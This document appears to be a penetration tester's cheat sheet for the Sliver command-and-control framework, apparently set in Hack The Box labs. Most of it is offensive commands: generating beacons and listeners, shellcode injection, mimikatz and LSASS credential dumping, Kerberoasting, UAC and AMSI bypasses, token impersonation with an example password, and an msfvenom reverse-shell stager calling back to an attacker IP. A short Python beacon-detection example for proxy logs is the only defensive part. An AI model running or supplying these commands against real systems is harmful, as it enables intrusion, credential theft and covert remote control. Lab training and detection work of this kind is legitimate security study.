Installation
Server Setup
Sliver's Server component has the important role of serving as the location implants will communicate back to.
Sliver's Client component has the role of being the location the user will execute the commands and tools needed to fulfill their objectives.
Intrusionz3r0@htb[/htb]$ wget -q https://github.com/BishopFox/sliver/releases/download/vx.x.xx/sliver-server_linux
Intrusionz3r0@htb[/htb]$ chmod +x ./sliver-server_linux
Intrusionz3r0@htb[/htb]$ sudo apt install mingw-w64
Client Setup
Intrusionz3r0@htb[/htb]$ wget -q https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-client_linux
Intrusionz3r0@htb[/htb]$ chmod +x ./sliver-client_linux
Intrusionz3r0@htb[/htb]$ ./sliver-client_linux import Intrusionz3r0_10.10.14.5.cfg
2023/09/27 11:45:03 Saved new client config to: /home/user/.sliver-client/configs/user_ipaddress.cfg
Intrusionz3r0@htb[/htb]$ ./sliver-client_linux
Operator profile
Sliver can differentiate who can connect based on the generated profile from its server.
[server] sliver > new-operator -n Intrusionz3r0 -l 10.10.14.5
[*] Generating new client certificate, please wait ...
[*] Saved new client config to: /opt/silver/Intrusionz3r0_10.10.14.5.cfg
Multiplayer mode
[server] sliver > multiplayer
Armory
sliver > armory install seatbelt
sliver > armory install <tool-name>
sliver > armory install all
Example 1: UAC-BOF-Bonanza
Intrusionz3r0@htb[/htb]$ git clone https://github.com/icyguider/UAC-BOF-Bonanza.git
Intrusionz3r0@htb[/htb]$ cp -rp PATH/UACBypasses/MODULE ~/.sliver-client/extensions/
Intrusionz3r0@htb[/htb]$ cd ~/.sliver-client/extensions/MODULE/; make
#Load modules from Sliver
sliver > extensions load ~/.sliver-client/extensions/MODULE
Example 2: Chisel
Intrusionz3r0@htb[/htb]$ git clone https://github.com/MrAle98/chisel
Intrusionz3r0@htb[/htb]$ cd chisel/
Intrusionz3r0@htb[/htb]$ mkdir ~/.sliver-client/extensions/chisel
Intrusionz3r0@htb[/htb]$ cp extension.json ~/.sliver-client/extensions/chisel
Intrusionz3r0@htb[/htb]$ make windowsdll_64
Intrusionz3r0@htb[/htb]$ make windowsdll_32
Intrusionz3r0@htb[/htb]$ cp chisel.x64.dll ~/.sliver-client/extensions/chisel/
Intrusionz3r0@htb[/htb]$ cp chisel.x86.dll ~/.sliver-client/extensions/chisel/
Generate Beacons
sliver > generate beacon --http <your_server_ip>:<PORT> --os linux --arch x86 --format elf --seconds 5 --jitter 3
sliver > generate beacon --mtls <your_server_ip> --os windows --arch amd64 --format exe --save /var/www/html
sliver > generate beacon --http 10.10.14.62:9002 --skip-symbols -N http-beacon
--jitter introduces randomness to callback times.
--seconds sets callback interval.
--skip-symbols disables obfuscation (less stealthy).
One of the main disadvantages of skipping the symbol obfuscation is that the beacon will be easily detectable as Sliver due to the imports being presented in plaintext.
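Seen from the network side, the --seconds and --jitter settings above produce check-ins at a near-regular cadence. The following is an added example (not part of the original page and not Sliver code) that scores per-client request gaps in proxy logs for that regularity; the log format, sample lines, function names and thresholds are constructed for illustration, and it assumes each sleep is the interval plus a bounded random delay.

```python
import statistics
from collections import defaultdict

# Constructed sample proxy log (not from the page): "<epoch_seconds> <client> <destination>"
SAMPLE_LOG = """\
1695814000.0 10.0.0.23 203.0.113.10:9002
1695814001.0 10.0.0.40 198.51.100.7:443
1695814001.2 10.0.0.40 198.51.100.7:443
1695814001.3 10.0.0.40 198.51.100.7:443
1695814005.4 10.0.0.23 203.0.113.10:9002
1695814009.8 10.0.0.40 198.51.100.7:443
1695814010.1 10.0.0.40 198.51.100.7:443
1695814012.5 10.0.0.23 203.0.113.10:9002
1695814018.7 10.0.0.23 203.0.113.10:9002
1695814024.6 10.0.0.23 203.0.113.10:9002
1695814032.4 10.0.0.23 203.0.113.10:9002
1695814037.5 10.0.0.23 203.0.113.10:9002
1695814047.0 10.0.0.40 198.51.100.7:443
1695814120.5 10.0.0.40 198.51.100.7:443
"""

def gaps_by_pair(log_text):
    """Return time-ordered inter-arrival gaps (seconds) per (client, destination)."""
    times = defaultdict(list)
    for line in log_text.splitlines():
        try:
            stamp, client, dest = line.split()
            times[(client, dest)].append(float(stamp))
        except ValueError:
            continue  # malformed or blank line: wrong field count or bad timestamp
    return {p: [b - a for a, b in zip(sorted(t), sorted(t)[1:])] for p, t in times.items()}

def find_beacons(log_text, min_gaps=5, min_score=0.7):
    """Flag pairs whose gaps cluster around one median (fixed interval plus bounded jitter)."""
    findings = {}
    for pair, gaps in gaps_by_pair(log_text).items():
        if len(gaps) < min_gaps:
            continue  # too few requests to judge regularity
        median = statistics.median(gaps)
        # Median absolute deviation: robust spread that one long pause does not distort
        mad = statistics.median([abs(g - median) for g in gaps])
        score = 1 - mad / median if median > 0 else 0.0
        if score >= min_score:
            findings[pair] = {"score": round(score, 3),
                              "min_gap": round(min(gaps), 1), "max_gap": round(max(gaps), 1)}
    return findings

if __name__ == "__main__":
    print(find_beacons(SAMPLE_LOG))
```

min_gaps and min_score are tuning values; check them against known-benign periodic traffic such as update checks and telemetry before alerting on the result.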
Listeners
sliver > http --lport 8088
sliver > http --lhost 10.10.14.62 --lport 9002
sliver > http
sliver > mtls
Useful commands
Execute commands
sliver (puppet-mtls) > execute -q cmd '/c <COMMAND>'
sliver (puppet-mtls) > execute -o powershell <PSCOMMAND>
sliver (puppet-mtls) > sharpsh -- '-e -c <BASE64-PowershellCommand>'
sliver (puppet-mtls) > execute-assembly /home/user/Rubeus.exe
sliver (puppet-mtls) > inline-execute-assembly /home/user/Rubeus.exe 'kerberoast /format:hashcat /user:alice /nowrap'
execute command as it will open a command prompt or the tool's GUI.
Memory Injection & Shellcode
#Inject shellcode into a new process
sliver (puppet-mtls) > execute-assembly /home/Intrusionz3r0/Documents/tools/Rubeus.exe createnetonly /program:C:\\windows\\system32\\notepad.exe
sliver (puppet-mtls) > execute-shellcode -p <pid> /home/Intrusionz3r0/Documents/tools/godpotato.bin #Created by donut
#Evade Defense loading and executing a DLL in a remote process
sideload /path/mimikatz.exe "token::elevate privilege::debug sekurlsa::logonpasswords exit"
Privilege escalation
#From Administrator to NT Authority System
sliver (TOTAL_NATIONAL) > getsystem
Credentials Attacks
#DUMP SAM Database
sliver (TOTAL_NATIONAL) > hashdump
#Dump LSA secrets
sliver (TOTAL_NATIONAL) > ps -e lsass
sliver (TOTAL_NATIONAL) > procdump --pid 524 --save /tmp/lsass.dmp
#Dump DPAPI creds
sliver (puppet-mtls) > sharpdpapi machinecredentials
Domain Enumeration
#Domain Enumeration
sliver (puppet-mtls) > sharp-hound-4 -s -t 300 -- -c all --zipfilename filename #(Compatible: bloodhound-convert or bloodhound-community)
sliver (puppet-mtls) > sharpview -- <POWERVIEW-COMMAND>
sliver (puppet-mtls) > sharpsh -t 300 -- '-u C:\\temp\\script.ps1 -c Invoke-Method'
sliver (puppet-mtls) > sharpsh -t 300 -- '-u PATH/PowerView.ps1 -e -c <BASE64>' #use base64 command on linux
sliver (http-beacon) > c2tc-domaininfo
Lateral Movement
#Impersonation
sliver (http-beacon) > make-token -u svc_sql -p jkhnrjk123! -d dc.domain.local
sliver (puppet-mtls) > ps
sliver (puppet-mtls) > migrate -p 3908
Full login session as if from keyboard input.
Run processes locally as a normal user; full access.
For accessing network resources; no full session created.
Access remote shares (e.g. \\server\share), no process execution.
Used by scheduled tasks or batch jobs.
Run automated tasks with minimal interaction.
Used by services running under a user account.
Run persistent background services.
Triggered when a user unlocks the workstation.
Not typically used in token impersonation.
Like network logon, but with plaintext password.
Remote authentication requiring cleartext password.
Credentials used only for outbound connections; local identity unchanged.
runas /netonly scenarios; access network as another user.
Kerberos
#Kerberoast
sliver (http-beacon) > inline-execute-assembly /path/Rubeus.exe 'kerberoast /format:hashcat /user:alice /nowrap'
sliver (http-beacon) > c2tc-kerberoast roast alice
sliver (http-beacon) > bof-roast rdp/web01.child.htb.local
#Delegation
sliver (http-beacon) > delegationbof 6 dc.domain.local
ADCS
#ADCS
sliver (http-beacon) > certify -- find
sliver (puppet-mtls) > sa-adcs-enum
Windows Enumeration
#Windows Enumeration
sliver (puppet-mtls) > sa-sc-enum #Enum windows services
sliver (puppet-mtls) > sa-netshares #Enum network shares SMB
sliver (puppet-mtls) > sa-cacls #Enum permissions
sliver (puppet-mtls) > sa-probe 10.10.235.135 22 #Check Open ports
AMSI Bypass
#Bypass AMSI
sliver (puppet-mtls) > SspiUacBypass 'C:\ProgramData\Puppet\puppet-update.exe'
Miscellaneous
Execute an unmanaged PowerShell
~/Documents/Tools/donut/donut -a 2 -i UnmanagedPowerShell.exe -o UnmanagedPowerShell.bin
[ Donut shellcode generator v1 (built Apr 30 2025 19:45:41)
[ Copyright (c) 2019-2021 TheWover, Odzhan
[ Instance type : Embedded
[ Module file : "UnmanagedPowerShell.exe"
[ Entropy : Random names + Encryption
[ File type : EXE
[ Target CPU : amd64
[ AMSI/WDLP/ETW : continue
[ PE Headers : overwrite
[ Shellcode : "UnmanagedPowerShell.bin"
[ Exit : Thread
sliver (COMBINED_AGLET) > execute-shellcode -i /home/Intrusionz3r0/Documents/Tools/UnmanagedPowerShell.bin
[*] Started remote shell with pid 1888
PS > New-ADIDNSNode -Tombstone -Verbose -Node WIN-Y5CPSL66T45 -DATA 10.8.5.48
Create a shellcode with MSFVenom and Sliver
We need to create a profile, a stage-listener, a stager and generate a payload through msfvenom.
sliver > profiles new --http 10.10.14.5:8088 --format shellcode z3r0
sliver > stage-listener --url tcp://10.10.14.5:4443 --profile z3r0
sliver > http -L 10.10.14.5 -l 8088
sliver > generate stager --lhost 10.10.14.5 --lport 4443 --format csharp --save staged.txt
#Lastly create the payload and replace the staged.txt on the sliver.aspx.
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.5 LPORT=4443 -f aspx > sliver.aspx